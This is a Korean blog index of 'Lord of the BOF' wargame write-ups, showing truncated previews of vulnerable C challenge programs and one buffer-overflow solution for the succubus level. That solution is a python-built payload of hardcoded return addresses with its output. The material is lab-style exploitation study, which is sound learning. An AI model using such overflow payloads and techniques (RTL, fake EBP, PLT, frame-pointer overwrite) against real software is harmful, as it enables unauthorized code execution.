공부/LOB
-
[lob] nightmare -> xavius공부/LOB 2015. 8. 21. 01:45
[nightmare@localhost nightmare]$ cat xavius.c /* The Lord of the BOF : The Fellowship of the BOF - xavius - arg */ #include #include #include main() { char buffer[40]; char *ret_addr; // overflow! fgets(buffer, 256, stdin); printf("%s\n", buffer); if(*(buffer+47) == '\xbf') { printf("stack retbayed you!\n"); exit(0); } if(*(buffer+47) == '\x08') { printf("binary image retbayed you, too!!\n"); ex..
-
[lob] succubus -> nightmare공부/LOB 2015. 2. 19. 05:00
[succubus@localhost succubus]$ cat nightmare.c /* The Lord of the BOF : The Fellowship of the BOF - nightmare - PLT */ #include #include #include #include main(int argc, char *argv[]) { char buffer[40]; char *addr; if(argc < 2){ printf("argv error\n"); exit(0); } // check address addr = (char *)&strcpy; if(memcmp(argv[1]+44, &addr, 4) != 0){ printf("You must fall in love with strcpy()\n"); exit(..
-
[lob] zombie_assassin -> succubus공부/LOB 2015. 2. 17. 17:00
payload = [dummy 44byte] + [do] + [gye] + [gul] + [yut] + [mo] + [ret dummy] + [buffer addr + 72] + ["my-pass\x0"] [zombie_assassin@localhost zombie_assassin]$ ./succubus `python -c 'print "a"*44 + "\xec\x87\x04\x08"+"\xbc\x87\x04\x08"+"\x8c\x87\x04\x08"+"\x5c\x87\x04\x08"+"\x24\x87\x04\x08"+"\xf0\xaf\xff\xbf"+"\x98\xfa\xff\xbf"+"my-pass\x0"'` aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.¼\$-p..
-
[lob] assassin -> zombie_assassin공부/LOB 2014. 7. 30. 20:07
[assassin@localhost assassin]$ cat zombie_assassin.c /* The Lord of the BOF : The Fellowship of the BOF - zombie_assassin - FEBP */ #include #include main(int argc, char *argv[]) { char buffer[40]; if(argc < 2){ printf("argv error\n"); exit(0); } if(argv[1][47] == '\xbf') { printf("stack retbayed you!\n"); exit(0); } if(argv[1][47] == '\x40') { printf("library retbayed you, too!!\n"); exit(0); }..
-
[lob] giant -> assassin공부/LOB 2014. 7. 30. 20:07
[giant@localhost giant]$ ls assassin assassin.c [giant@localhost giant]$ cat assassin.c /* The Lord of the BOF : The Fellowship of the BOF - assassin - no stack, no RTL */ #include #include main(int argc, char *argv[]) { char buffer[40]; if(argc < 2){ printf("argv error\n"); exit(0); } if(argv[1][47] == '\xbf') { printf("stack retbayed you!\n"); exit(0); } if(argv[1][47] == '\x40') { printf("lib..
-
[lob] bugbear -> giant공부/LOB 2014. 7. 30. 20:07
[bugbear@localhost bugbear]$ cat giant.c /* The Lord of the BOF : The Fellowship of the BOF - giant - RTL2 */ #include #include #include main(int argc, char *argv[]) { char buffer[40]; FILE *fp; char *lib_addr, *execve_offset, *execve_addr; char *ret; if(argc < 2){ printf("argv error\n"); exit(0); } // gain address of execve fp = popen("/usr/bin/ldd /home/giant/assassin | /bin/grep libc | /bin/a..
-
[lob] darkknight -> bugbrear공부/LOB 2014. 7. 30. 20:06
[darkknight@localhost darkknight]$ cat bugbear.c /* The Lord of the BOF : The Fellowship of the BOF - bugbear - RTL1 */ #include #include main(int argc, char *argv[]) { char buffer[40]; int i; if(argc < 2){ printf("argv error\n"); exit(0); } if(argv[1][47] == '\xbf') { printf("stack betrayed you!!\n"); exit(0); } strcpy(buffer, argv[1]); printf("%s\n", buffer); } (gdb) b main Breakpoint 1 at 0x8..
-
[lob] golem -> darknight공부/LOB 2014. 7. 30. 20:06
[golem@localhost golem]$ cat darkknight.c /* The Lord of the BOF : The Fellowship of the BOF - darkknight - FPO */ #include #include void problem_child(char *src) { char buffer[40]; strncpy(buffer, src, 41); printf("%s\n", buffer); } main(int argc, char *argv[]) { if(argc